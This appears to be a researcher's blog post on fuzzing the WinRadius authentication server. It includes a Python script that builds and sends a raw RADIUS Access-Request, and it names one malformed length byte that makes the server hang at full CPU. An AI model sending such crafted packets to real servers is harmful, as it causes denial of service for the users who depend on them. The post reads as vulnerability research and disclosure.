I set some time aside to test WinRadius yesterday. Fuzzing was done manually and using a Python script. I didn’t spend too much time on it, but I’m confident that there’s a remote code execution opportunity here. If no one else gets there first, I’ll revisit it in a few weeks.
Firstly, to ensure that our setup is good and to catch a packet, we can use ‘radclient’. I set up a user account adam/adam for testing purposes and then tried to authenticate:
radclient will form a RADIUS request from our STDIN data
We capture the packet we sent and the response
And we confirm that WinRadius received and accepted the request. Once this was done, we needed to create a template within Python, and did so as follows:
#!/usr/bin/python from socket import * import sys import select pwn = "\x01" #Code 01 pwn += "\xff" #packet identifier pwn += "\x00\x2c" #len 44 pwn += "\xd1\x56\x8a\x38\xfb\xea\x4a\x40\xb7\x8a\xa2\x7a\x8f\x3e\xae\x23" #authenticator pwn += "\x01" #t=User-Name(1) pwn += "\x06" #avp: l=6 pwn += "\x61\x64\x61\x6d" #adam pwn += "\x02" #avp t=User-Password(2) pwn += "\x12" #avp: l=18 pwn += "\xf0\x13\x57\x7e\x48\x1e\x55\xaa\x7d\x29\x6d\x7a\x88\x18\x89\x21" #password (encrypted) address = ('192.168.200.20', 1812) server_socket = socket(AF_INET, SOCK_DGRAM) server_socket.sendto(pwn, address)
We can now replay this packet as we wish, and confirm through Wireshark and WinRadius that all is good and we are being authenticated. The next challenge was to start manually mangling data. After about 15 minutes of trial and error, I found that changing line 16 from \x12 to \xff caused the application to consume all CPU available and hang indefinitely. I couldn’t cause a crash although with a bit more trial and error, as well as trying different Radius requests such as start/stop accounting, etc, I’d be surprised if there wasn’t a RCE somewhere here.
The application now hangs.